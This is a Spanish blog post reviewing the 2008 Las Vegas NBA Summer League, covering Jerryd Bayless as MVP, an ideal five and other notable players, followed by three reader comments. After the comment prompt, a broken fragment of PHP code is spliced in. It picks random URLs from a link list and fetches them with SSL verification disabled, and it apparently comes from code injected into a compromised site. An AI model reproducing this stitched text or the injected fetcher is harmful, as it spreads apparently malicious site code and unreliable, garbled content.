Bayless dominó la Summer League de Las Vegas

21 de July de 2008 por Dantley

Concluyó ayer el maratón de partidos de la Summer League de Las Vegas. Los GM de 21 equipos de la NBA han tenido oportunidad durante 10 días para acumular información sobre jóvenes –y no tan jóvenes- promesas. Y si en algunas ocasiones, el nivel de baloncesto no ha sido espectacular, al menos los restaurantes en Las Vegas son de primera calidad, como decía Donnie Walsh en una de las transmisiones que nba.com ha realizado en directo.

MVP

El nombre del torneo ha sido sin duda Jerryd Bayless. MVP de la Summer League, Bayless ha promediado casi 30 puntos por partido con una exhibición permanente en los 4 partidos que ha disputado. Se conocía su capacidad de penetración y sus condiciones físicas, pero ya con un nivel de exigencia superior al que ha tenido en la NCAA, ha demostrado que tiene capacidad para llevar un one-man-show si su equipo lo necesita. En su partido frente a Phoenix, Bayless anotó 36 de los 73 puntos que dieron la victoria a Portland.

No obstante, Bayless también ha lanzado algún mensaje de duda. Su dirección de juego ha sido escasa, reafirmando la idea de que es más un 2 en el cuerpo de un base, que un director de orquesta puro.

A Portland se le presenta un bendito problema, cómo optimizar los grandes recursos que tiene en el backcourt. Brandon Roy debe ser el jefe de la banda, pero Bayless se ha ganado un puesto preferente. Blake, Rudy Fernández y Martell Webster pueden completar esas posiciones de las que, parece probable que Sergio Rodríguez puede desaparecer, incluso con la presión de Petteri Koponen que puede haberse ganado un puesto en el roster.

Quinteto ideal

En la Summer League cada jugador tiene un objetivo, desde rookies de primer nivel intentando desde ya ganarse minutos en la liga regular, hasta jugadores no drafteados apurando sus posibilidades de firmar un contrato, bien en la NBA o bien en Europa, pasando por jugadores de segundo o tercer año que quieren progresar delante de sus entrenadores. Haremos una breve referencia de los más destacados. Pero primero, hagamos un análisis sobre nuestro particular quinteto ideal. A nuestro juicio, los jugadores que han mostrado un mayor nivel y consistencia han sido los siguientes:

Guards: C.J. Watson y Jerryd Bayless

Forwards: Donta Greene y Marreese Speights

Center: Kevin Love

C.J. Watson acompañaría a Bayless en el quinteto ideal. El juego de Watson no es ni mucho menos espectacular, pero sí es cierto que ha sabido aportar en muchos departamentos del juego a uno de los tres únicos equipos que han acabado con un balance 4-1 en la Summer League. 18.8 puntos, 3.5 rebotes, 4.8 asistencias y unos escalofriantes 4.2 robos por partidos conforman una estadística completísima. Watson tiene una oportunidad de continuar en los Warriors o, en caso contrario en algún otro equipo que necesite un segundo o tercer base suplente.

Los forwards de primer año han destacado sobremanera en la Summer League. Con Anthony Randolph quedándose fuera del quinteto por poco, tanto Greene como Speights han mostrado momentos de muy alto nivel. Greene se exhibió el primer día con 40 puntos, aunque luego bajo su rendimiento hasta quedarse en 22.6 puntos por partido. En cualquier caso, la variedad de movimientos de Donta Greene parece que le abre un prometedor futuro en Houston. Speights, por su parte, ha mantenido un nivel físico bueno durante toda la Summer League, precisamente una de las mayores dudas que generaba su paso por Florida. 18 puntos y 10 rebotes completan una magnífica estadística, reforzada por un tiro de 4-5 metros más consistente de lo esperado.

Hemos colocado a Kevin Love como center del quinteto ideal, aunque persiste la duda de cómo Minnesota encajará sus piezas durante la liga regular. Love ha promediado 18 puntos y nada menos que 13.5 rebotes por partido. Su cifra de asistencias no es espectacular, 1.8 por partido, pero las asistencias sí lo han sido. Kevin Love ha mostrado un muy buen nivel físico, lo que ayudado por una capacidad asombrosa para coger la posición en un jugador de tan sólo 19 años, le ha permitido ser el mejor reboteador del torneo.

Otros jugadores destacados

Entre los rookies podemos destacar a Anthony Randolph, D.J. Augustin, J.J. Hickson, O.J. Mayo y Jason Thompson. El que más potencial ha demostrado es Randolph, mientras que Mayo ha alternado grandes jugadas con una selección de tiro poco acertada.

Muchos jugadores de segundo o tercer año han tenido actuaciones muy destacadas. Entre otros, podemos citar a Quincy Douby, Alando Tucker, Joey Graham, Wilson Chandler,Ramon Sessions y Jason Smith. Otros como Thaddeus Young comenzaron muy bien pero perdieron interés en el torneo.

Finalmente, está los jugadores que, estando sin equipo, intentan desesperadamente colarse en los rosters de algún equipo. Entre ellos, el que más nos ha impresionado es Bobby Brown, un joven base que el año pasado destacó en el Alba Berlín y que ha llamado poderosamente la atención de algunos equipos como potencial tercer base. Desafortunadamente, no todos lo consiguen. Con 31 años y  recuperado de sus graves problemas de salud, Robert “Tractor” Traylor, ha participado en la Summer League con la intención de pelear por un hueco en la liga. Sus más de 130 kilos le han valido para capturar algunos rebotes, pero está muy lejos de tener posibilidades de conseguir su objetivo en estos momentos.

Comenta

3 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Gran analisis señor dantley.

      Citar

  2. Dantley dice:
    #2

    Gracias.

    Por cierto, otro nombre curioso de la Summer League, el inigualable Panchi Barrera, aquel base uruguayo que fichó el Joventut para sus escalafones inferiores y que luego ha ido rodando de equipo en equipo sin suerte. El caso es que ha tenido sus momentos de gloria. Con los Rockets, ha repartido asistencias de todos los colores, que es lo suyo y seguro que algún ohhhh inesperado le ha arrancado a los gringos. El año pasado, por ejemplo, Sergio Sánchez no tuvo tanta suerte.

      Citar

  3. TheDeerHunter dice:
    #3

    Lo dicho por “chapas”, Dantley… un crack.

    Sólo me preocupa una cosa:
    [“En uno de los muchos e-mails recibidos, un fan se quejaba de que su novia le había dejado porque veía diariamente todos los partidos de la summer league, a lo que los comentaristas respondieron con un “normal, yo también te habría dejado”.]
    (Cuando veas las barbas de tu vecino cortar pon las tuyas a remojar. XD )

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>